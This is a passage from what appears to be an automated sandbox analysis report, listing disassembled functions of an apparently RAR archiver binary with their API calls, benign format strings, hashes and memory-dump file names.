                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: LoadString$fflushswprintf
                                                                                                                                                                                                                                        • String ID: %d.%02d$[
                                                                                                                                                                                                                                        • API String ID: 1946543793-195111373
                                                                                                                                                                                                                                        • Opcode ID: f04d483f56175c8b40415d20487cbec804232b663c65daca34dce35784760712
                                                                                                                                                                                                                                        • Instruction ID: 2b98494bc62aa2521ff08ae934bb4bdfb1a346876231d9ec32ef9a98342f18da
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f04d483f56175c8b40415d20487cbec804232b663c65daca34dce35784760712
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 03316121B0F5C2E1FA62EB24E1153BD6791AF48784F8440BBD64D8B6C6DF2CE946C740
                                                                                                                                                                                                                                        Function 00007FF6AA1C3C20 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: snprintf
                                                                                                                                                                                                                                        • String ID: $%s$@%s
                                                                                                                                                                                                                                        • API String ID: 4288800496-834177443
                                                                                                                                                                                                                                        • Opcode ID: 7a7053d11aa3be1251aeb62ffc93e7b2ac424df20b613d8193438d5ab2157725
                                                                                                                                                                                                                                        • Instruction ID: a565259f5ee0a2887f4622c3ce2fe9ebe51345ff66eed297b8663607512a3971
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7a7053d11aa3be1251aeb62ffc93e7b2ac424df20b613d8193438d5ab2157725
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9B31B122B0AA82E5EA128F55E4507BE6360FB457C4F800077DE4D97B99DE3CE917D700
                                                                                                                                                                                                                                        Function 00007FF6AA1BF474 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: swprintf
                                                                                                                                                                                                                                        • String ID: fixed%u.$fixed.
                                                                                                                                                                                                                                        • API String ID: 233258989-2525383582
                                                                                                                                                                                                                                        • Opcode ID: fddd7528cb08c65f409e766db47ba8cea55e1086a780a4f54c28e47408ad2848
                                                                                                                                                                                                                                        • Instruction ID: 9642bb995ca456c3b4cc0c1f4a4a816cf9b9ea9431a2979a1d5332e644db5701
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fddd7528cb08c65f409e766db47ba8cea55e1086a780a4f54c28e47408ad2848
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CA31D522A09681E2EB12DB25E5013E963A0FB44790F904273EA9D9779ADF3CE907C740
                                                                                                                                                                                                                                        Function 00007FF6AA1C49F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: LoadString
                                                                                                                                                                                                                                        • String ID: Adding %-58s
                                                                                                                                                                                                                                        • API String ID: 2948472770-2059140559
                                                                                                                                                                                                                                        • Opcode ID: 029dc5b3afc22f1748ed18b4bb1637acba6cd1f0e3e62fcee6acc39158075de8
                                                                                                                                                                                                                                        • Instruction ID: da4c0d2f4784e7ff996199c4c23743cf48eebb90ba99992fda09938daac68daa
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 029dc5b3afc22f1748ed18b4bb1637acba6cd1f0e3e62fcee6acc39158075de8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C1114975B1AA81C5E6119F16E944179B7A1FB98FC0B58847ACE0DC3328EE3CEA538244
                                                                                                                                                                                                                                        Function 00007FF6AA185DB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: swprintf
                                                                                                                                                                                                                                        • String ID: ;%%0%du
                                                                                                                                                                                                                                        • API String ID: 233258989-2249936285
                                                                                                                                                                                                                                        • Opcode ID: 5630f68361fdad429f81d227d618e3426730f2a1c59dfa690c7e09baebf2de4d
                                                                                                                                                                                                                                        • Instruction ID: fc86e5d9fee055a7112224516638544dc3176142e1c6746644eec49e65344079
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5630f68361fdad429f81d227d618e3426730f2a1c59dfa690c7e09baebf2de4d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 28118622A09680D6E7229B24E4113E97761FB88B58F894172DF4D87659DE3CED46CB40
                                                                                                                                                                                                                                        Function 00007FF6AA1A331C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 00007FF6AA1B42CC: swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6AA1B430F
                                                                                                                                                                                                                                        • GetVolumeInformationW.KERNEL32(?,00007FF6AA1A0BED,?,?,00000000,?,?,00007FF6AA19F30F,00000000,00007FF6AA186380,?,00007FF6AA182EC8), ref: 00007FF6AA1A337E
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InformationVolumeswprintf
                                                                                                                                                                                                                                        • String ID: FAT$FAT32
                                                                                                                                                                                                                                        • API String ID: 989755765-1174603449
                                                                                                                                                                                                                                        • Opcode ID: b1ebeb30fd722dd76b352bce1e824f537b2a19fc82dbcf7dfb484d1401dd98df
                                                                                                                                                                                                                                        • Instruction ID: e3872978e12015d583b302082d2836d56257ee0059ed6bf2eb4d0b9e30bb34a9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b1ebeb30fd722dd76b352bce1e824f537b2a19fc82dbcf7dfb484d1401dd98df
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D9118231B1DA82D1EB618B10E8913EA7395FF85344F805072E58DC3A95DF3CE91ACB04
                                                                                                                                                                                                                                        Function 00007FF6AA1CB974 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16synchronizationCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorExceptionLastObjectSingleThrowWait
                                                                                                                                                                                                                                        • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                                                                                                                                                        • API String ID: 564652978-2248577382
                                                                                                                                                                                                                                        • Opcode ID: 46226563a9827009269dbdda457766bca55c7f33c1314a041e0b52dd23cb2e00
                                                                                                                                                                                                                                        • Instruction ID: aedb1132c86be5c24486aafd513767af16e397eb9c3a303049633fda919e43d1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 46226563a9827009269dbdda457766bca55c7f33c1314a041e0b52dd23cb2e00
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C4E04F21E0A842E2E642A725AD810B83361EF60774FD403B3D43EC21E5AF2CAD47C311